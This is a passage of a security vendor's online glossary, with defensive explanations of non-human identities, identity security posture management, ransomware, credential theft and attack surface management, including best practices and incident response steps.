attractive targets. Ensuring least privilege is complex due to varied functions. Documentation and OversightTypically well-documented with clear processes for onboarding and offboarding. Often lack proper documentation, especially in dynamic environments, increasing the difficulty of effective management and security. Examples and Use Cases for NHIs . Below are some key use cases and examples that highlight the importance and functionality of NHIs across various platforms. Integrating Applications: OAuth tokens enable seamless integration between applications, allowing them to share data and functionality securely. For instance, a marketing platform might use OAuth tokens to integrate with CRM systems, automating data synchronization. Automating Workflows: Robotic Process Automation (RPA) relies heavily on NHIs to perform tasks that mimic human actions, such as processing transactions, manipulating data, and communicating with other digital systems. Managing Cloud Services: NHIs, like service accounts in cloud environments, manage various cloud services, including provisioning resources, scaling applications, and monitoring performance. This ensures efficient and scalable cloud operations. CI/CD Pipelines: Service accounts within CI/CD tools like Jenkins or GitLab automate the build, test, and deployment processes, ensuring rapid and consistent delivery of software updates. Service Accounts within Active Directory: In an Active Directory environment, service accounts are used to run essential services like database management systems, web servers, and other critical applications. These accounts need to be carefully managed and monitored to prevent unauthorized access and potential security incidents. These examples illustrate the diverse use cases of NHIs and their significance in enhancing operational efficiency. However, the increased reliance on NHIs also underscores the need for robust security measures to mitigate the associated risks. Security Risks and Challenges of NHIs Non-human identities (NHIs) introduce a unique set of security risks and challenges that can compromise the integrity of IT environments if not properly managed. Understanding these risks is crucial for developing effective security strategies. Lack of Visibility, Monitoring, and Governance One of the most significant risks associated with NHIs is the lack of visibility. Organizations often have difficulty maintaining an accurate inventory of NHIs, resulting in blind spots in their security posture. Unless properly monitored and governed, NHIs can easily be overlooked, making them prime targets for attackers. Risk of Compromised Credentials It is common for NHIs to use static credentials, such as API keys and service account passwords, which can be stolen or leaked. Compromised credentials can lead to unauthorized access and data breaches. A notable example is the Cloudflare breach, where API keys were exploited to gain unauthorized access to sensitive information . Potential for Lateral Movement within Networks Attackers can utilize compromised NHIs to move laterally within a network, escalating their privileges and accessing sensitive systems and data. As a result of the high privileges assigned to NHIs, which are necessary for them to perform their intended functions, this lateral movement is facilitated. Once inside the network, attackers are able to exploit these privileges in order to achieve their malicious goals. Lack of Service Account Visibility Service accounts, a common type of NHI, are frequently created and forgotten, leading to a large number of accounts with unknown or poorly documented purposes. This lack of visibility hampers the ability to monitor and manage these accounts effectively, increasing the risk of misuse. Organizations cannot implement proper security controls without a comprehensive understanding of all active service accounts. Increased Attack Surface The presence of NHIs significantly increases the attack surface of an organization. Each NHI represents a potential entry point that can be exploited by malicious actors. In order to prevent unauthorized access and data breaches, this expanded attack surface requires vigilant monitoring and robust security measures. NHIs can be easily compromised without proper visibility and control, leading to severe consequences for the organization's security posture. Over-Permissiveness Over-permissiveness is a common security issue in environments where NHIs are assigned amplified privileges more than necessary. This can be a result of poor security practices or misconfigurations, and it can allow attackers to exploit these excessive privileges to gain broader access within the network. There are several ways that attackers can exploit over-permissiveness. For example, an attacker could gain access to a privileged account and use it to modify system settings, install malware, move laterally, or access sensitive data. Additionally, an attacker could use a privileged account to launch attacks against other systems on the network Inadequate Lifecycle Management Without proper lifecycle management, NHIs can remain active long after they are needed, retaining access to critical resources and posing ongoing security risks. Outdated NHIs may not have the same level of security features as newer versions, leaving them more susceptible to cyberattacks or insider threats. Failure to decommission NHIs in accordance with regulatory requirements can also result in compliance violations and potential penalties. Redundant or unnecessary NHIs can also strain IT systems and resources, leading to performance issues and increased operational costs. Best Practices for Securing NHIs Securing non-human identities (NHIs) requires a multifaceted approach that addresses their unique challenges and vulnerabilities. Here are some best practices to ensure robust protection for NHIs: Implementing Robust Access Policies and Tools Least Privilege Principle: Ensure that NHIs are granted only the permissions necessary to perform their specific tasks. Regular audits of NHIs and adjust access controls to minimize excessive privileges. Role-Based Access Control (RBAC): Implement RBAC to manage and enforce access policies based on the roles and responsibilities associated with each NHI. Access Policy Automation: Use automated tools to enforce access policies and ensure compliance. This reduces the risk of human error and ensures that policies are consistently applied across all NHIs. Real-Time Monitoring and Auditing Credentials Continuous Monitoring: Implement continuous monitoring solutions to track the activities of NHIs in real time. This helps in detecting anomalies and potential security threats promptly. Audit Logs: Maintain detailed audit logs of all actions performed by NHIs. Regularly review these logs to identify suspicious activities and investigate potential security incidents. Alerting Mechanisms: Set up automated alerting systems to notify the security or SOC teams of any unusual or unauthorized activities involving NHIs. This enables quick responses to potential threats. Using Ephemeral Certificates and Zero Trust Principles Ephemeral Certificates: Utilize short-lived certificates for authentication instead of static credentials. Ephemeral certificates reduce the risk of credential compromise and limit the window of opportunity for attackers. Zero Trust Architecture: Adopt a Zero Trust approach to security, where no entity is trusted by default, regardless of whether it is inside or outside the network perimeter. Continuously verify the identity and access privileges of NHIs. Micro-Segmentation: Implement micro-segmentation to isolate NHIs within the network. This limits lateral movement and reduces the impact of a potential breach. Conclusion Non-human identities have become indispensable for automating processes and ensuring operational efficiency. However, the proliferation of NHIs introduces unique security challenges that cannot be overlooked. These entities often possess elevated privileges and operate without direct human oversight, making them attractive targets for cyber attackers. Real-world incidents, such as the Cloudflare breach, highlight the potential consequences of inadequate NHI management. These cases underscore the importance of visibility, governance, and the need for specialized security measures tailored to the unique nature of NHIs. For cybersecurity and IT professionals, the call to action is clear: prioritize the management and protection of NHIs as a critical component of your overall security strategy. By doing so, you can safeguard your organization against unauthorized access, data breaches, and other cyber threats, ensuring a secure and resilient IT environment. --- - Published: 2024-03-21 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-security-posture-management/ The continuous process of auditing and strengthening IAM environments—such as user access, authentication methods, and entitlements—to remediate vulnerabilities and reduce identity risk. Information Security Posture Management (ISPM) is the process of managing and improving an organization's security policies and controls related to digital identities and their access. ISPM helps identify and remediate weaknesses and vulnerabilities associated with identity and access management (IAM). It is vital for any organization to ensure that all user accounts are secure so that resources can be accessed securely. However, they also present risks if not properly managed. ISPM aims to identify and mitigate these risks through continuous monitoring of access controls. This includes reviewing access policies, access entitlements, authentication methods, and auditing capabilities. Why is ISPM important? ISPM is essential for any organization that relies on user accounts to control access. It helps: Reduce the risk of data breaches resulting from compromised users or excessive access privileges. Improve compliance with regulations like NIST, NIS2, NY-DFS,GDPR that require organizations to limit access to personal data. Optimize identity and access management to enable secure access while reducing complexity. Gain visibility into identity risks that could threaten critical resources. In order to achieve effective ISPM, organizations need to implement continuous monitoring of their IAM environments. This includes automating identity audits, access reviews, and control assessments to detect potential issues. Organizations should then remediate any identified risks by updating policies, deprovisioning excessive access, enabling MFA, and applying other security controls to strengthen their security posture. With increasing threats targeting identities, ISPM has become crucial for cybersecurity and protecting critical resources. By continuously applying stronger access controls to their users, organizations can reduce their attack surface and strengthen their defenses. Overall, ISPM helps enable a proactive approach to identity security. The Importance of Managing Identity Security Posture As organizations adopt cloud services and expand their digital footprints, identity security posture management has become more crucial. If mismanaged, dormant accounts, weak passwords, overly permissive access rights, and orphaned accounts can all become attack vectors for bad actors to exploit. Misconfigured identity and access management (IAM) policies are a common security threat. Without proper management, accounts can accumulate excessive privileges over time that go unnoticed. It's important to review IAM policies regularly and ensure the least privilege access. Dormant accounts belonging to former employees or contractors pose risks if left enabled. They should be disabled or deleted when no longer needed. third-party and orphaned accounts that lack ownership are easily overlooked but attractive targets. They should be monitored closely and de-provisioned when possible. Enforcing strong, unique passwords and multi-factor authentication (MFA) for accounts helps prevent unauthorized access. Regular password audits and rotation policies reduce the chances of old, weak, or reused passwords. In hybrid environments, identity synchronization between on-prem directories and cloud platforms must be properly set up and monitored. Out-of-sync identities and passwords create security threats. With comprehensive identity security posture management, organizations can gain visibility into their identity weak spots, automate controls, and proactively reduce potential risks to their digital assets and infrastructure. Key Capabilities of Identity Security Posture Management Solutions Identity and Access Management (IAM) ISPM solutions enable organizations to implement technologies like MFAand single sign-on (SSO) to verify users' identities and control access to systems and data. MFA adds an extra layer of security by requiring multiple methods to log in, such as a password and a one-time code sent to the user's phone. SSO allows users to access multiple applications with a single set of login credentials. Privileged Access Management (PAM) ISPM solutions facilitate the management and monitoring of privileged accounts, which have elevated access to critical systems and data. Capabilities include vaulting and rotating (or regularly changing) privileged account passwords, closely auditing the activities of privileged users, and enforcing multi factor authentication for privileged accounts. Identity Governance and Administration (IGA) ISPM solutions help organizations manage user identities, access rights, and permissions. Key capabilities include automating user provisioning and de-provisioning, streamlining the review and certification of user access, and detecting and remediating excessive user access and entitlements. Identity Analytics and Risk Intelligence (IARI) ISPM solutions leverage data analytics to gain visibility into user behavior and identify threats. Capabilities include baselining normal user behavior, detecting anomalies that could indicate compromised accounts or insider threats, analyzing access and entitlement risks, and calculating an organization's identity risk posture and maturity. ISPM solutions provide a robust set of capabilities to help secure an organization's user accounts, manage privileged access, govern user entitlements, and gain intelligence into identity risks. By leveraging these capabilities, organizations can reduce their attack surface, strengthen compliance, and build resilience. Implementing an Identity Security Posture Management Program To implement an effective Identity Security Posture Management (ISPM) program, organizations should take a comprehensive approach focused on continuous monitoring, risk assessments, strong authentication, least privilege access, and addressing SaaS sprawl. Continuous Monitoring Continuous monitoring of user activities and access in real-time is crucial for managing identity security risks. By constantly scanning for anomalies in user behavior and access patterns, organizations can quickly detect potential threats and vulnerabilities. Continuous monitoring solutions analyze user activities across on-premises and cloud environments to identify risky behaviors that could indicate compromised accounts or insider threats. Regular Risk Assessments Conducting regular risk assessments is key to uncovering weaknesses in an organization’s identity and access management program. Risk assessments evaluate roles, entitlements, and access permissions to identify excessive privileges and unused accounts. They help organizations revise access policies to implement least privilege access and tighten security controls. Strong Authentication Requiring MFA for user logins and privileged access helps prevent unauthorized access. MFA adds an extra layer of security by requiring not only a password but also another method like a security key, biometric, or one-time code sent to the user's mobile device or email. Enforcing MFA, especially for administrative access, helps shield organizations from compromised credential attacks. Least Privilege Access Implementing least privilege access control policies ensures that users only have the minimum level of access necessary to perform their jobs. Strict access management, including frequent access reviews and the timely de-provisioning of unused accounts, reduces the attack surface and limits the damage from compromised accounts or insider threats. Addressing SaaS Sprawl With the rapid adoption of Software-as-a-Service (SaaS) apps, organizations struggle to gain visibility and control over user access and activities across a growing number of cloud services. Solutions that provide a single pane of glass to manage access and entitlements across SaaS environments help address the security risks introduced by SaaS sprawl. They enable a consistent approach to access governance, risk management, and compliance across the organization. --- - Published: 2024-01-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/ransomware/ Malicious software that encrypts an organization’s data or systems and demands a ransom to release the decryption key, often coupled with extortion tactics. Ransomware is a type of malicious software, or malware, that encrypts files on a device, rendering them inaccessible. The attacker then demands a ransom payment in exchange for decrypting the files. Ransomware has been around since 1989 but has become more prevalent and sophisticated in recent years. The earliest forms of ransomware were relatively simple, locking access to the computer system. Modern ransomware variants encrypt specific files on the system's hard drive using asymmetric encryption algorithms that generate a pair of keys: a public key to encrypt the files and a private key to decrypt them. The only way to decrypt and access the files again is with the private key held by the attacker. Ransomware is often delivered through phishing emails containing malicious attachments or links. Once executed on the victim's system, it encrypts files and displays a ransom note with instructions for how to pay to recover access. The ransom is usually demanded in a cryptocurrency like Bitcoin to avoid being traced. There are two primary types of ransomware: Locker ransomware locks users out of their computers or files. It locks the entire system and prevents any access. Crypto-ransomware encrypts files on the system, making them inaccessible. It targets specific file extensions like documents, images, videos, and more. Ransomware has become a lucrative criminal business model. New variants are continuously developed and released to maximize the amount of money extorted from victims. Prevention through cybersecurity best practices like backing up data and employee education are the best defenses against ransomware. How Ransomware Works Ransomware is a form of malware that encrypts files or locks access to a device, then demands payment of a ransom to restore access. Ransomware infections typically happen in one of three ways: Trojan Downloads Disguised as legitimate software, Trojans are downloaded by unsuspecting users and install ransomware on the system. These are often distributed through malicious code embedded within email attachments, software cracks, or pirated media. Phishing Emails Phishing emails contain malicious links or attachments that install ransomware when clicked or opened. The emails are designed to appear as though they're from a legitimate company to trick the recipient into downloading the payload. Exploiting Vulnerabilities Some ransomware takes advantage of vulnerabilities in network systems or software to spread to connected devices. Once a device is infected, the ransomware encrypts files on that system and any network shares it has access to. Ransomware payloads typically display messages on the screen demanding payment of a ransom, usually in cryptocurrency like Bitcoin, to regain access to the files or system. The ransom amount varies but is often several hundred to several thousand dollars. Paying the ransom, however, does not guarantee that access will be restored. Ransomware has become a lucrative business for cybercriminals. Through the use of malware kits and affiliate programs, even those without advanced technical skills can easily deploy ransomware campaigns. As long as ransomware proves profitable, it is likely to continue posing a threat to both individuals and organizations. Maintaining reliable backups, keeping software up to date, and educating users about cyber threats are some of the best defenses against ransomware. The Different Types of Ransomware There are three main types of ransomware that cyber security professionals should be aware of: scareware, screen lockers, and encrypting ransomware. Scareware Scareware, also known as deception ransomware, tricks victims into believing their systems have been locked or compromised in order to extort money. Messages claiming that illegal content was detected or system files were encrypted are displayed to frighten the user into paying a “fine. ” In reality, no such action has actually occurred. Scareware is usually easy to remove using antivirus software. Screen Lockers Screen lockers, or lock screen ransomware, locks users out of their devices by displaying full-screen messages over the login screen. They prevent access to the system by locking the screen, but do not actually encrypt any files. Some well-known examples are Reveton and FbiLocker. While frustrating, screen lockers typically do not do any permanent damage and can often be removed using a malware removal tool. Encrypting Ransomware Encrypting ransomware is the most serious type. It encrypts files on infected systems using encryption algorithms that are difficult to break without the decryption key. The ransomware demands payment, often in cryptocurrency, in exchange for the decryption key. If the ransom is not paid, the files remain encrypted and inaccessible. Some infamous examples of encrypting ransomware are WannaCry, Petya, and Ryuk. Encrypting ransomware requires prevention and backup strategies, as data recovery is very difficult without paying the ransom. Mobile Ransomware  Mobile ransomware is a type of malware that can infect your phone and lock you out of your mobile device. Once infected, the malware will encrypt all of your data, and ask for a ransom in order to restore it. If you don't pay the ransom, the malware can even delete your data. To defend against ransomware, organizations should focus on employee education, strong security controls, antivirus software, keeping systems up to date, and maintaining secure data backups. Paying ransoms only encourages further criminal activity and does not guarantee that files will be recovered, so should be avoided. With vigilance and proactive defensive measures, the impact of ransomware can be minimized. Recent Major Ransomware Attacks Ransomware attacks have become increasingly common and damaging in recent years. Several major incidents highlight how vulnerable organizations have become to these threats. WannaCry In May 2017, the WannaCry ransomware attack infected over 200,000 computers across 150 countries. It targeted vulnerabilities in Microsoft Windows operating systems, encrypting files and demanding ransom payments in Bitcoin. The UK's National Health Service was hit hard, forcing some hospitals to turn away non-emergency patients. Total damages exceeded $4 billion. NotPetya Shortly after WannaCry, NotPetya emerged. Disguised as ransomware, NotPetya was actually a wiper virus designed to destroy data. It brought down Ukrainian infrastructure like power companies, airports, and banks. NotPetya spread globally, infecting companies like FedEx, Maersk, and Merck. NotPetya caused over $10 billion in damages, making it the costliest cyberattack in history at the time. Ryuk In 2019, Ryuk ransomware targeted over 100 US newspapers. The attack encrypted files, disrupted printing operations, and demanded a $3 million ransom. Several newspapers had to publish smaller editions or switch to online-only for days. Ryuk has since hit other sectors like healthcare, logistics, and finance. Experts tie Ryuk to a sophisticated North Korean state-sponsored group. Ransomware has rapidly become a national security threat and economic menace. Healthcare, government, media, shipping, and financial services seem to be favored targets, though any organization is at risk. Ransom demands are often six or seven figures, and even if paid, there is no guarantee of data recovery. The only way for companies and governments to defend against ransomware is through vigilance, preparation, and cooperation. Educating employees, maintaining offline backups, keeping software up to date, and enacting an incident response plan can help reduce vulnerability. But as long as there are profits to be made from ransomware, it will likely remain an ongoing battle. How to Prevent Ransomware Infections To prevent ransomware infections, organizations should implement a multi-layered approach focused on employee education, robust security controls, and reliable backups. Employee Education Employees are often the targets of ransomware attacks through phishing emails containing malicious links or attachments. Educating staff about these threats, and providing training on spotting potential attacks, is critical. Employees should be wary of unsolicited requests for sensitive information or links and taught not to open attachments from unknown or untrusted senders. Regular reminders and simulated phishing campaigns can help reinforce lessons and identify areas needing improvement. Network Segmentation and Endpoint Protection Network segmentation separates parts of the network into smaller networks to better control access and contain infections. If ransomware enters one segment, segmentation prevents it from spreading to the entire network. Robust endpoint protection, including antivirus software, intrusion prevention systems, and regular patching help block ransomware and other malware. Two-factor authentication for remote access and admin accounts provides an extra layer of security. Backups Frequent and redundant data backups are key to recovering from a ransomware attack without paying the ransom. Backups should be stored offline and offsite in case the network is compromised. Test restoring backups regularly to ensure the process works and data is intact. If ransomware encrypts files, having accessible backups prevents permanent data loss and eliminates the need to pay the ransom. Additional Controls Other useful controls include restricting user permissions and privileges, monitoring for signs of compromise like unusual network activity, and planning an incident response strategy in the event of infection. Staying up-to-date with the latest ransomware threats and attack methods, and sharing that knowledge across the organization, helps IT teams implement appropriate defenses. With strong controls and a focus on education and preparation, organizations can avoid becoming victims of ransomware attacks. But even with the best practices in place, ransomware is an ever-present threat. Regular testing of controls and responses helps minimize damage if an attack succeeds. When implemented together, these layers of defense provide the best protection against ransomware. Ransomware Incident Response Ransomware attacks require a quick and strategic response to minimize damage and ensure recovery. Immediate Response Upon discovering a ransomware infection, the first step is to isolate the infected systems to prevent the malware from spreading further. Next, determine the scope and severity of the attack to identify which systems and data have been impacted. Secure backup data and disconnect storage devices to protect them from encryption. With systems isolated, professionals can work to contain and remove the ransomware. Antivirus software and malware removal tools should be used to scan systems and delete malicious files. A full system restore from backup may be required for badly infected machines. During this process, monitor systems for reinfection. Ransomware variants are constantly evolving to evade detection, so customized tools and techniques may be needed to fully eliminate an advanced strain. In some cases, a ransomware’s encryption may be irreversible without paying the ransom. However, paying ransoms funds criminal activity and does not guarantee data retrieval, so should only be considered as an absolute last resort. Long-term Recovery Following a ransomware attack, a comprehensive review of security policies and procedures is needed to strengthen defenses and prevent reinfection. Additional staff training on cyber risks and response may also be required. To restore encrypted data, organizations can use backup files to overwrite infected systems and recover information. Regular, offline data backups are key to minimizing data loss from ransomware. Multiple versions of backups over time allow restoration to a point before initial infection. Some data may remain unrecoverable if backup files were also encrypted. In these situations, organizations must determine if lost information can be recreated or obtained from other sources. They may need to accept permanent data loss and plan to rebuild certain systems entirely. Ransomware attacks can be devastating, but with quick thinking and the right strategies, organizations can overcome them. Staying vigilant and preparing for various scenarios will ensure the most effective response when disaster strikes. Continuous evaluation and improvement of cyber defenses can help reduce risks over the long run. Ransomware Statistics and Trends Ransomware attacks have been on the rise in recent years. According to Cybersecurity Ventures, global ransomware damage costs are predicted to reach $20 billion in 2021, up from $11. 5 billion in 2019. Symantec’s Internet Security Threat Report found a 105% increase in ransomware variants from 2018 to 2019. The most common types of ransomware today are lock screen ransomware, encryption ransomware, and double extortion ransomware. Lock screen ransomware locks users out of their devices. Encryption ransomware encrypts files and demands payment for the decryption key. Double extortion ransomware encrypts files, demands payment, and also threatens to release sensitive stolen data if payment is not made. Ransomware attacks frequently target healthcare organizations, government agencies, and educational institutions. These organizations often have sensitive data and may be more willing to pay ransoms to avoid disruption and data breaches. However, paying ransoms emboldens cybercriminals to continue and expand ransomware operations. Most ransomware is delivered through phishing... --- - Published: 2024-01-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/credential-theft/ The act of stealing login credentials through methods like phishing, malware, brute-force attacks, or data breaches, allowing unauthorized access and potential lateral movement. Credential theft refers to stealing someone's login credentials, such as usernames and passwords. Cybercriminals use the compromised credentials to gain access to valuable data and accounts, enabling identity theft and financial fraud. Once cybercriminals have access to compromised credentials, they can log into accounts and try to move laterally across an organization's environment. For organizations, credential theft can lead to compromised business accounts, stolen intellectual property, and damaged reputations. There are a few common ways for thieves to steal credentials: Phishing emails and malicious websites: Malicious actors trick victims into entering their credentials on spoofed login pages or by installing malware. Keylogging software: Malware tracks the keys victims press and captures their usernames and passwords. Brute force attacks: Software automates guessing passwords to access accounts. Database breaches: When companies’ databases are hacked, thieves access and steal customers’ credentials. Wi-Fi snooping: Thieves access public Wi-Fi networks to view the credentials victims enter on websites and apps. To reduce the threat of credential theft, individuals should enable multi-factor authentication on accounts when available, use unique complex passwords, and be cautious of phishing attempts. Organizations should enforce strong password policies, limit access to sensitive data, monitor for database breaches, and provide regular employee cybersecurity training. Methods Cybercriminals Use for Credential Theft Credential theft refers to the act of stealing and compromising a user’s login credentials, like usernames and passwords, to gain unauthorized access to sensitive data and accounts. Malicious actors use various methods to steal credentials, including: Phishing and Spear-Phishing Phishing attacks involve sending fraudulent emails posing as a legitimate company to trick victims into entering their login credentials on a fake website. Spear-phishing targets specific individuals or groups with personalized messages which tend to be from the person’s friends or colleagues. These techniques are commonly used to steal credentials. Keylogging and Malware Keylogging software and malware discreetly monitor and record the keys pressed on a keyboard, capturing login credentials and other sensitive data. Cybercriminals then access the captured information to gain access to accounts and networks. Social Engineering Social engineering attacks rely on manipulating people into divulging confidential information like passwords. Cyber attackers may call, email or text posing as tech support or a colleague to trick victims into sharing credentials under false pretenses. Brute Force Attacks Brute force attacks work by entering numerous password combinations in an attempt to guess the correct login credentials. While time-consuming, with powerful computers and algorithms, criminals can crack weak passwords. Using strong, unique passwords helps prevent these attacks. Database Theft Some criminals hack into databases containing usernames, passwords and other private records. The stolen database is then used to access associated accounts and profiles. Data breaches have exposed billions of credentials, so password reuse poses serious risks. Types of Credentials Targeted Credential theft refers to the stealing of login credentials like usernames, passwords, and account numbers. These sensitive data points allow access to online accounts and systems. Cybercriminals who obtain stolen credentials can compromise accounts to steal money and personal information or install malware. Passwords Passwords are a common target of credential theft. Hacking techniques like phishing, keylogging, and brute force attacks are used to obtain passwords. Once passwords are stolen, criminals try them on other accounts belonging to the victim like email, banking, and social media. Password reuse and weak, easy-to-guess passwords make this type of credential theft more likely to succeed. Account Numbers Bank accounts, credit cards, and insurance policy numbers are also valuable targets. These numbers provide direct access to funds and accounts. Account numbers are often obtained through database breaches, skimming devices at ATMs and gas stations, or by stealing financial statements and documents from the physical or digital mailbox. Security Questions The answers to account security questions like “What is your mother’s maiden name? ” or “What was your first pet’s name? ” are credentials that are frequently targeted. These questions are meant to verify someone’s identity over the phone or online, so the answers can be used to break into accounts. Criminals obtain the answers through phishing, social engineering, and scouring people’s social media profiles. Biometric Data Biometric credentials such as fingerprints, facial recognition data, and retina scans are becoming more commonly used to authenticate identity and access accounts. However, biometric credentials can also be stolen and used by criminals to impersonate victims. Photos and fingerprint images have been leaked in data breaches, and researchers have demonstrated how facial recognition systems can be fooled using photos and 3D printed masks. Although biometric authentication is convenient, no credential is foolproof if stolen. Impacts of Credential Theft Credential theft has serious consequences for both individuals and organizations. Once cybercriminals have stolen login credentials, they gain unauthorized access that can be used for various malicious purposes. Data Breaches With stolen credentials, attackers can access sensitive data stored on networks and systems. They may be able to view or steal trade secrets, customer information, employee records, and other confidential data. These types of breaches can damage a company's reputation, violate privacy laws, and undermine customer trust. Lateral Movement Access to one set of compromised credentials gives hackers a foothold to move laterally within the network in search of additional access and control. They can use credential theft to hop from user to user or system to system, eventually gaining admin-level access. From there, they have control over the entire network's resources. Ransomware Attacks Hackers frequently deploy ransomware attacks after first gaining network access through stolen credentials (using credential stuffing, for example). Once they have admin access, they can encrypt files and systems across the network and demand a ransom payment to decrypt them. These attacks can cripple operations for days or weeks and result in significant financial losses. Account Takeover With someone's username and password in hand, cybercriminals can access online accounts and impersonate the legitimate account owner. They may conduct fraudulent transactions, steal money or data, send malicious messages, or damage the reputation of the account owner. Account takeover has become a major problem, impacting both consumers and businesses. Best Practices to Prevent Credential Theft To effectively prevent credential theft, organizations should implement several best practices. Privileged Access Management Managing and monitoring privileged accounts, especially those with administrative access, is crucial. These accounts should be limited to specific users and closely audited. Multi-factor authentication should be required for all privileged accounts to verify the identity of anyone accessing them. Application Whitelisting Limiting corporate credentials to only approved applications and services reduces the risk of theft. Whitelisting specifies which programs are authorized to run on a network, blocking all others. This prevents malicious software from accessing credentials. Regular Updates and Patch Management Keeping all systems and software up-to-date with the latest patches ensures that any vulnerabilities that could be exploited to steal credentials are addressed. Updates should be installed promptly across operating systems, applications, network devices and any other technologies. User Access Reviews Conducting frequent reviews of user access rights and privileges verifies that only authorized individuals have access to systems and accounts. Any accounts that are no longer needed should be deactivated. This limits the potential attack surface for credential theft. Security Awareness Training Educating end users about the risks of credential theft and the best practices they can follow is one of the most effective defenses. Phishing simulations and refresher training should be conducted regularly. Users should be taught never to share account credentials or click suspicious links. Password Rotation Changing account passwords, keys and other credentials on a routine basis minimize the window of opportunity for theft. The more frequently credentials are rotated, the less useful any stolen credentials become. However, rotation policies should balance security and usability. Detecting Credential Theft To detect credential theft, organizations should monitor for signs of unauthorized access or account misuse. Some indicators of compromised credentials include: Login attempts from unknown devices or locations. If a user suddenly logs in from an unfamiliar IP address or device, their account may have been compromised. Multiple failed login attempts. Repeated failed login attempts could indicate that an attacker is trying to guess or brute force a user's password. New unauthorized access roles or permissions. If a user account is given elevated access rights that the legitimate owner did not request, this could signal an account takeover. Strange account activity times. Account access during unusual hours, especially late at night or early morning, could indicate that an attacker is using the stolen credentials. Impossible travel activity. If a user's account is accessed from multiple distant locations within a short period, this could indicate that the credentials have been stolen, as physical travel between those locations would be impossible. Data exfiltration. Unusual downloads, uploads, or file transfers from an account could indicate that an attacker is stealing data using stolen login information. Password changes by unknown users. If a user's password is changed without their knowledge or request, this is a sign that the account has likely been hijacked by an unauthorized individual. Organizations should monitor user accounts for these suspicious activities and configure automated alerts to detect potential credential theft events as soon as possible. Promptly notifying users about detected compromise and requiring password resets can help minimize damage from stolen login information. Frequent employee education and phishing simulation campaigns also help strengthen credential security and reduce the risk of theft. Staying vigilant for signs of unauthorized access and taking swift action in response to detected events is key to protecting against the damages of credential theft. With constant monitoring and proactive defense, organizations can guard their systems and sensitive data from compromise via stolen login details. Responding to Credential Theft Incidents Responding to credential theft incidents requires prompt action to limit damage. Once an organization discovers compromised credentials, the following steps should be taken: Identify the compromised accounts. Determine which user accounts have had their login credentials compromised. This may require analyzing account activity logs to find unauthorized logins or access. Identify both internal employee accounts as well as any external accounts, like social media profiles. Lock down the affected accounts. Immediately disable or lock the compromised accounts to prevent further unauthorized access. This includes disabling accounts on the organization’s network and systems as well as any linked external accounts like social media profiles. Reset account passwords. Require all users with stolen credentials to reset their passwords. This includes accounts used to access the organization’s network and systems as well as personal accounts like email, social media, and banking accounts. Reset passwords for any accounts that used the same or similar login credentials. Enable MFA if available. Accounts that support MFA, like email, social media, and VPN access, require users to enable this additional layer of security. MFAadds an extra layer of protection for accounts in the event credentials are stolen again in the future. Monitor accounts for suspicious activity. Closely monitor the compromised accounts over the following weeks and months for any signs of further unauthorized access or suspicious logins. This can help detect if the credentials have been stolen again or if the cybercriminals still have access. Provide additional cybersecurity training. Reinforce good cybersecurity practices with additional education and training for all staff. This includes training on creating strong, unique passwords, identifying phishing emails, and other best practices for account security. Ongoing education and training help strengthen an organization's security posture against future credential theft attacks. Following these steps can help limit the damage from credential theft incidents and reduce the likelihood of future attacks. With prompt response and action, organizations can contain security incidents, strengthen their defenses, and build staff awareness about account security risks. Conclusion By understanding the methods and motivations behind credential theft, cyber security professionals can implement controls and safeguards to help detect and mitigate these types of attacks While no defense is foolproof, maintaining awareness of the latest threats and taking a multi-layered approach to access control and identity management will help reduce risk and build resilience. By working together, security teams and individuals can stay ahead of the curve and protect their organizations' data, accounts, and networks. --- - Published: 2024-01-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/attack-surface-management/ The ongoing process of discovering, monitoring, and reducing an organization’s vulnerabilities and exposed assets to shrink its attack surface. Attack Surface Management (ASM) is the process of monitoring, managing and reducing an organization's attack surface, which comprises all the vulnerabilities and weaknesses that malicious actors can exploit to gain unauthorized access. ASM helps identify, monitor, and minimize an organization's attack surface by gaining visibility into IT assets, vulnerabilities, and cyber risks. Attack Surface Management Solutions use asset discovery and inventory tools to gain visibility into all IT assets, including virtual, cloud, and shadow IT infrastructure and other previously unknown assets. They scan these assets for vulnerabilities and software misconfigurations that could be exploited. ASM also monitors an organization's external digital footprint, like domains and subdomains, to identify risks from exposed assets. Armed with this information, cybersecurity teams can prioritize and mitigate the highest risks across the organization's attack surface. They can also simulate real-world cyberattacks to identify blind spots and see how well their defenses hold up. By shrinking the attack surface, organizations reduce the opportunities for compromise and make it more difficult for attackers to gain a foothold. Understanding the Attack Surface An organization’s attack surface refers to all the possible entry points that could be exploited by an attacker to compromise systems and data. This includes on-premises assets like servers, desktops, routers and IoT devices, as well as identity and access management systems, cloud assets, and external systems connected to the organization's network. The attack surface is constantly evolving as new digital infrastructure, devices, and connections are added over time. New vulnerabilities are frequently discovered in software and systems, and attackers are constantly developing new exploitation techniques. This means the attack surface is continually expanding and introducing new risks. Some of the most common entry points in an attack surface include: On-premises endpoints like servers, desktops, laptops and IoT devices. These contain valuable data and access, and are often targeted. Cloud assets such as storage, databases, containers, and serverless functions. Cloud adoption has greatly increased the attack surface for most organizations. Identity and access management systems. Identity is an attack surface, since compromised credentials are one of the top attack vectors used to breach networks. External connections to partners, customers or subsidiary networks. These connections expand the attack surface and introduce risks from less trusted networks. Shadow IT systems set up by employees without organizational approval or oversight. These hidden systems are security blind spots in the attack surface. Attack surface management is the practice of continuously identifying, analyzing, and reducing potential entry points to minimize risks. This includes gaining visibility into all assets, connections and access points in the organization’s infrastructure, and taking action to shrink the attack surface by closing vulnerabilities, reducing excess access, and improving security controls. The Value of Attack Surface Management Attack Surface Management (ASM) provides significant value to organizations in managing cyber risk. ASM tools automatically discover and map all assets across an organization's environment, identifying vulnerabilities and misconfigurations. This enables security teams to gain visibility into the scope of their attack surface, prioritize risks, and remediate issues. Improved Security Posture By gaining a comprehensive understanding of all assets and vulnerabilities, ASM strengthens an organization's security posture. Security teams can identify weaknesses, close security gaps, and reduce opportunities for compromise. With continuous monitoring, ASM solutions provide an always-up-to-date inventory of assets and risks. This allows organizations to make risk-based decisions and focus resources on the highest priority items. Reduced Risk ASM mitigates risk by patching vulnerabilities and misconfigurations that could be exploited in an attack. Solutions can automatically discover new assets as they come online, check for vulnerabilities, and notify security teams so they can remediate risks before they are targeted. ASM also allows organizations to model how changes might impact their attack surface, so they can make adjustments to avoid increasing risk. By shrinking the attack surface, ASM makes it more difficult for adversaries to find entry points into the environment. Improved Compliance For 